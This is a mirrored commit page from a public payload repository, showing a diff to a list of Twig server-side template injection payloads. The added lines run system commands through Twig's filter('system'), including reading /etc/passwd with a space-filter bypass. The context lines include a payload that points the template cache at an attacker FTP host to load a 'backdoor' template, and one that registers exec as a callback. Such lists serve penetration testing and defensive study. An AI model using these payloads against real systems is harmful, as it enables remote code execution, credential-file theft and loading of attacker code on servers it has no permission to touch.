mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-23 12:55:27 +00:00
Merge pull request #173 from SakiiR/sakiir
Added filter(system) twig RCE
This commit is contained in:
commit
b5cc379c4b
@ -157,6 +157,9 @@ $output = $twig > render (
|
|||||||
{{self}}
|
{{self}}
|
||||||
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
|
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
|
||||||
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
|
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
|
||||||
|
{{['id']|filter('system')}}
|
||||||
|
{{['cat\x20/etc/passwd']|filter('system')}}
|
||||||
|
{{['cat$IFS/etc/passwd']|filter('system')}}
|
||||||
```
|
```
|
||||||
|
|
||||||
Example with an email passing FILTER_VALIDATE_EMAIL PHP.
|
Example with an email passing FILTER_VALIDATE_EMAIL PHP.
|
||||||
|
Loading…
Reference in New Issue
Block a user